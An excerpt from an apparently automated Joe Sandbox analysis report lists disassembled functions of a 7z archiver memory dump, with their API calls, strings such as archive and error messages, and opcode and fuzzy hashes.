                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: CreateDirectoryfree$ErrorLast
                                • String ID:
                                • API String ID: 3252411863-0
                                • Opcode ID: d3a5d44a16c63213326289f5f19480a8151ed31848b30160420883b42acee868
                                • Instruction ID: 4d73ab091a93de3593b3e60d2b686decea2d7057bb8b9c76cc2de7ceab64ea0d
                                • Opcode Fuzzy Hash: d3a5d44a16c63213326289f5f19480a8151ed31848b30160420883b42acee868
                                • Instruction Fuzzy Hash: B401D83234C60582DA309B32E9843AE1335ABC57A8F4842229E6E877A5DF1CC9C6D709
                                Function 0044EF24 Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 57756d85c65f05cda8d1a774ccd206aecd44e4c111d0521ad48d3dc7cc5f1731
                                • Instruction ID: bd91faddf8a814b45f4a09f0c9820f6653b2ea525bbcdf869f299193584bab90
                                • Opcode Fuzzy Hash: 57756d85c65f05cda8d1a774ccd206aecd44e4c111d0521ad48d3dc7cc5f1731
                                • Instruction Fuzzy Hash: 6BF01D2228560D43CA15F736F66126E5210E786B95B4015239E2A97311DE7CC4E78208
                                Function 00440CAC Relevance: 7.5, APIs: 6, Instructions: 38COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 08845d820ad8a366d5d4bd19e7b6d5ca9f480e4a13f5d0935fdc3c213a3a5d05
                                • Instruction ID: f32dbd37c854599f1f6f00c23696c7a3a241c9896cf233a1f67e06b4a8b1bc17
                                • Opcode Fuzzy Hash: 08845d820ad8a366d5d4bd19e7b6d5ca9f480e4a13f5d0935fdc3c213a3a5d05
                                • Instruction Fuzzy Hash: B9F0812374168D8ADB10AE77E9910AC13109B85BEC75C4236AF1D9F704DE68CCA28344
                                Function 00440D24 Relevance: 7.5, APIs: 6, Instructions: 38COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 75a5f18dca9dfb400c00d5047afe98c59e73a89a94cd2149e7029f224defeac9
                                • Instruction ID: 05834e6b5fccc0830e3398adb1bc520ddbe138e17e40e14f76c5fcbd890b7ffb
                                • Opcode Fuzzy Hash: 75a5f18dca9dfb400c00d5047afe98c59e73a89a94cd2149e7029f224defeac9
                                • Instruction Fuzzy Hash: 0DF0A4A3B41A888ADB10BE77E98119C13109F55BEDB4C4236AF2D5B744DE6CCCE28344
                                Function 00422DE4 Relevance: 7.5, APIs: 6, Instructions: 19COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 6ba20e383c5cd0500879b364b40f6d610812b00baf9de314c07cc055ac161e38
                                • Instruction ID: 484e05e859f0807ca02f8f68328cee660cf6c14cc770368382424b3f7a7b1439
                                • Opcode Fuzzy Hash: 6ba20e383c5cd0500879b364b40f6d610812b00baf9de314c07cc055ac161e38
                                • Instruction Fuzzy Hash: E8E0FD7265050D82CB14FB77E99106C1324E7D5F4C75411179E2DDF215CD5CCCE28384
                                Function 0046C088 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 82COMMON
                                Download Yara Rule
                                APIs
                                • fputs.MSVCRT ref: 0046C0F9
                                • fputs.MSVCRT ref: 0046C137
                                  • Part of subcall function 0046B4D0: memset.MSVCRT ref: 0046B515
                                  • Part of subcall function 0046B4D0: fputs.MSVCRT ref: 0046B53A
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputs$memset
                                • String ID: : Removing files after including to archive$Removing
                                • API String ID: 3543874852-1218467041
                                • Opcode ID: 365388ec8888a5bce23a62c4f5d5e77054b05830bb32acd764291167100e0300
                                • Instruction ID: 53ef0378ef48463589e5662a453143be2616249fa93fcc7a82b33ac10ed5e9dc
                                • Opcode Fuzzy Hash: 365388ec8888a5bce23a62c4f5d5e77054b05830bb32acd764291167100e0300
                                • Instruction Fuzzy Hash: B9319472200AC192DF68EB36E4843EE6360E751748F4885279BDF46262EF7CD5CAC309
                                Function 00416D34 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 78windowCOMMON
                                Download Yara Rule
                                APIs
                                • FormatMessageW.KERNEL32 ref: 00416DAB
                                • LocalFree.KERNEL32 ref: 00416DCD
                                  • Part of subcall function 004138A8: free.MSVCRT ref: 004138E0
                                Strings
                                • Error #, xrefs: 00416E49
                                • Internal Error: The failure in hardware (RAM or CPU), OS or program, xrefs: 00416D6F
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: FormatFreeLocalMessagefree
                                • String ID: Error #$Internal Error: The failure in hardware (RAM or CPU), OS or program
                                • API String ID: 1548054572-2710258398
                                • Opcode ID: 20b43a755eaab6f0b60d24cb7f7119fbc301bdbbf503d56a6452c0fe947358cf
                                • Instruction ID: d19e30ce4cea1da1fdc86295ab4a1b0791ee6e0d548fb38156c3774fab0a5f1d
                                • Opcode Fuzzy Hash: 20b43a755eaab6f0b60d24cb7f7119fbc301bdbbf503d56a6452c0fe947358cf
                                • Instruction Fuzzy Hash: E131DF7631478086CB20DF1AE44079E77A5F7C5BA4F858227EA8987794DB7CC1C8CB18
                                Function 0046C7CC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                Download Yara Rule
                                APIs
                                • fputs.MSVCRT ref: 0046C84D
                                • fputs.MSVCRT ref: 0046C85D
                                • free.MSVCRT ref: 0046C8A3
                                  • Part of subcall function 0046B4D0: memset.MSVCRT ref: 0046B515
                                  • Part of subcall function 0046B4D0: fputs.MSVCRT ref: 0046B53A
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputs$freememset
                                • String ID: :
                                • API String ID: 2276422817-3653984579
                                • Opcode ID: ce0f28461d904f08132136cc83bb4c139334b143193e053e8f0566a4fc46ea30
                                • Instruction ID: 38657b230df64cf3f981a887839f72f225543e0ee1670fbc78a75858b555421a
                                • Opcode Fuzzy Hash: ce0f28461d904f08132136cc83bb4c139334b143193e053e8f0566a4fc46ea30
                                • Instruction Fuzzy Hash: 8611E72230064592DB28EB26D9503BD5310FBC4BA8F484637DE5E83796EF7CC4A58308
                                Function 0046BB30 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                Download Yara Rule
                                APIs
                                • fputs.MSVCRT ref: 0046BBB7
                                • free.MSVCRT ref: 0046BBD6
                                  • Part of subcall function 0046B4D0: memset.MSVCRT ref: 0046B515
                                  • Part of subcall function 0046B4D0: fputs.MSVCRT ref: 0046B53A
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputs$freememset
                                • String ID: ERROR: $WARNING:
                                • API String ID: 2276422817-2114518728
                                • Opcode ID: d0996b5e8e12d31675c94c5f881c50677770b38ee2a16e5292798ad8c1da3d44
                                • Instruction ID: ec8759f765b9849bcce073acd0382558a5a12104e64027b77bdf76199e1e486c
                                • Opcode Fuzzy Hash: d0996b5e8e12d31675c94c5f881c50677770b38ee2a16e5292798ad8c1da3d44
                                • Instruction Fuzzy Hash: E211B962301A4041DB24EB27EA517EE1310E785BE8F48422B9F6F97395EF6CC8D5C308
                                Function 004608D8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50COMMON
                                Download Yara Rule
                                APIs
                                • EnterCriticalSection.KERNEL32 ref: 004608ED
                                • fputs.MSVCRT ref: 00460955
                                  • Part of subcall function 0046B4D0: memset.MSVCRT ref: 0046B515
                                  • Part of subcall function 0046B4D0: fputs.MSVCRT ref: 0046B53A
                                • LeaveCriticalSection.KERNEL32 ref: 00460993
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: CriticalSectionfputs$EnterLeavememset
                                • String ID: ERROR:
                                • API String ID: 2331179553-977468659
                                • Opcode ID: e888156a1853ba4761498555462a4bc233c2ca63b88db46f8e9df512e0cf9918
                                • Instruction ID: 7ce8546304f5b4e41256a5054b02d6edd7f833a29e2f296b121f26ee665e555e
                                • Opcode Fuzzy Hash: e888156a1853ba4761498555462a4bc233c2ca63b88db46f8e9df512e0cf9918
                                • Instruction Fuzzy Hash: 93118EB631194181EB09DF26D9507EA2322EBD4FA8F084236DF1E4B765DF3888C9C318
                                Function 00412BA0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 50COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID:
                                • String ID: a$z
                                • API String ID: 0-4151050625
                                • Opcode ID: 6ae0dc97e00bf20445782d7632547404e64b5bc7cdb6d7c8bcc16cb23f98946c
                                • Instruction ID: ef4fa0efca9c915425799369eeeb09f40b8555c163e801a609f67e931131adc2
                                • Opcode Fuzzy Hash: 6ae0dc97e00bf20445782d7632547404e64b5bc7cdb6d7c8bcc16cb23f98946c
                                • Instruction Fuzzy Hash: AF01D176B0D055C9DB207F156B443F95351A711B95F8D41338F0A87301EA9C59F2E30E
                                Function 0041BDA4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: AddressHandleModuleProc
                                • String ID: RtlGetVersion$ntdll.dll
                                • API String ID: 1646373207-1489217083
                                • Opcode ID: 3270b66177bae0e4f37cbf032a5b585ff5bf23b06b314f74da539d27339d0187
                                • Instruction ID: 5bee21ea830a95e3dc15abf5ab8cee94762f3597f3eb81ea26745f525f578605
                                • Opcode Fuzzy Hash: 3270b66177bae0e4f37cbf032a5b585ff5bf23b06b314f74da539d27339d0187
                                • Instruction Fuzzy Hash: DBF04F31609700D6EE30DB20E5843EA23E0E798318F540826D70E42750EB7CC995CE89
                                Function 0046BD78 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28COMMON
                                Download Yara Rule
                                APIs
                                • fputs.MSVCRT ref: 0046BD9B
                                • fputs.MSVCRT ref: 0046BDC8
                                  • Part of subcall function 00412790: fputs.MSVCRT ref: 004127D9
                                  • Part of subcall function 00412790: free.MSVCRT ref: 004127E5
                                  • Part of subcall function 00412790: free.MSVCRT ref: 004127F0
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputs$free
                                • String ID: Open archive: $StdOut
                                • API String ID: 3873070119-2401103298
                                • Opcode ID: 259d005b7b975df63041c016e984978adc1b57a87d4006b95cd48e7fee3ee52f
                                • Instruction ID: 8fa44a115ca32a3c04df6dfa669ff680118849953bec09a67667fab892899e1f
                                • Opcode Fuzzy Hash: 259d005b7b975df63041c016e984978adc1b57a87d4006b95cd48e7fee3ee52f
                                • Instruction Fuzzy Hash: 03F03AE531198081CE459F26DA843991321EB84FD8F18D4328E0E8B718EF28C4D9C304
                                Function 00461B70 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputs$fputc
                                • String ID: $:
                                • API String ID: 1185151155-4041779174
                                • Opcode ID: f5960870aff27ab24c9c1dd5abc4ad69187a291fb0c5e0ce632aed7b778ae011
                                • Instruction ID: 6763fbd81d9d2fa16c2503a32dcee1d932a76e7985570cf754bf2f74a761291f
                                • Opcode Fuzzy Hash: f5960870aff27ab24c9c1dd5abc4ad69187a291fb0c5e0ce632aed7b778ae011
                                • Instruction Fuzzy Hash: D2E06DE630878082CB159B26E94439D6321EB99FDCF488122DF8E07B5ADF6CC188C715
                                Function 0046D8C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: AddressHandleModuleProc
                                • String ID: GetLargePageMinimum$kernel32.dll
                                • API String ID: 1646373207-2515562745
                                • Opcode ID: 8e9a9dab5b7f2e19df094af4520333db7a13ff35ee5bd9949f6b110a8c73edde
                                • Instruction ID: 39f0b685d939d741628749837bc60bceda74a92e8b2eec32f8a789c3c4bbaf91
                                • Opcode Fuzzy Hash: 8e9a9dab5b7f2e19df094af4520333db7a13ff35ee5bd9949f6b110a8c73edde
                                • Instruction Fuzzy Hash: 21E0E6E5B57B06C1EE45DB51FC9532523647B84740F84066A860E83370FF3CD949C349
                                Function 0041B97C Relevance: 6.4, APIs: 5, Instructions: 140COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00413730: free.MSVCRT ref: 0041376A
                                  • Part of subcall function 00413730: memmove.MSVCRT(00000000,?,?,00000000,004110B0), ref: 00413785
                                • free.MSVCRT ref: 0041B9EE
                                • free.MSVCRT ref: 0041BB01
                                • free.MSVCRT ref: 0041BB4B
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$memmove
                                • String ID:
                                • API String ID: 1534225298-0
                                • Opcode ID: 1edef8d2d17e7871c7b36134c7c96cf4c91f11fedf76d5df42718696c7cc1c0f
                                • Instruction ID: c31e0b977c88c470eb095bedb4445449ecb5f85eafee1bd4dae91a796306d0f3
                                • Opcode Fuzzy Hash: 1edef8d2d17e7871c7b36134c7c96cf4c91f11fedf76d5df42718696c7cc1c0f
                                • Instruction Fuzzy Hash: E241E67321854095CA20EF16E0900EEA721EBD57D8B445227FA9F47B69DF3CC9C6CB89
                                Function 0042A024 Relevance: 6.4, APIs: 5, Instructions: 132COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 31f3892dfa6178f8f9ff0b2c81836e69a63e742398415a8d620e122b4eac7c34
                                • Instruction ID: 77aac4f33f53287caae4abeee5db639b4e96a0c8cff86c616d4c9d9bf797a827
                                • Opcode Fuzzy Hash: 31f3892dfa6178f8f9ff0b2c81836e69a63e742398415a8d620e122b4eac7c34
                                • Instruction Fuzzy Hash: 2F411723315B9097CB20DE22E5502AE6360F785BF4F884216EE9E47B54EF3CC9A5CB05
                                Function 0041A954 Relevance: 6.3, APIs: 5, Instructions: 98COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: ErrorLastfree
                                • String ID:
                                • API String ID: 2167247754-0
                                • Opcode ID: 9e5ac0819ccd73d860c5bb0ac35cb87d2fcfabdfe1c81ef86ca79644d4d74276
                                • Instruction ID: aa564fda5a29deb5161dec622c1acb42d2b8035fe7c01f832aad4952ec2b5951
                                • Opcode Fuzzy Hash: 9e5ac0819ccd73d860c5bb0ac35cb87d2fcfabdfe1c81ef86ca79644d4d74276
                                • Instruction Fuzzy Hash: C7312E3225554455CA30EB26E5513EE6721EBD13E8F400317FAAA87AA5DE2CCCD7C70E
                                Function 00439D70 Relevance: 6.3, APIs: 5, Instructions: 84COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$ErrorLastmemmove
                                • String ID:
                                • API String ID: 3561842085-0
                                • Opcode ID: 91663e74d70eaacb513d60a4784cfbb330a645ba5be1881762ea54d7b565f1b6
                                • Instruction ID: 7d37d53894940bcedac8ca1f7d1d6eecb2e7417fecc3460e36bee4bf1fedecca
                                • Opcode Fuzzy Hash: 91663e74d70eaacb513d60a4784cfbb330a645ba5be1881762ea54d7b565f1b6
                                • Instruction Fuzzy Hash: 9821B66220464555DB20EB22F8417EA6320E7D57E8F44132BFEAD876D5DF6CC98AC708
                                Function 00441548 Relevance: 6.3, APIs: 5, Instructions: 62COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: memcmp
                                • String ID:
                                • API String ID: 1475443563-0
                                • Opcode ID: a891cb515865a68be5e6a03bd8abd97aaf33105ab184db28d6fece49421a2b41
                                • Instruction ID: ae93e9628ea9000b8202b0258fd6a4e8ee2623b53c6d2d52b57f951dcbb30684
                                • Opcode Fuzzy Hash: a891cb515865a68be5e6a03bd8abd97aaf33105ab184db28d6fece49421a2b41
                                • Instruction Fuzzy Hash: 4C1191E6309745A1FB149B2B99403E923659766FC4FC44426DE0A47315FF7CC986D30D
                                Function 00452FE8 Relevance: 6.3, APIs: 5, Instructions: 62COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: memcmp
                                • String ID:
                                • API String ID: 1475443563-0
                                • Opcode ID: 5001601b6dd0e9dc131b0f3698d5251bc58e879868400dfb826f7ca5e64397d1
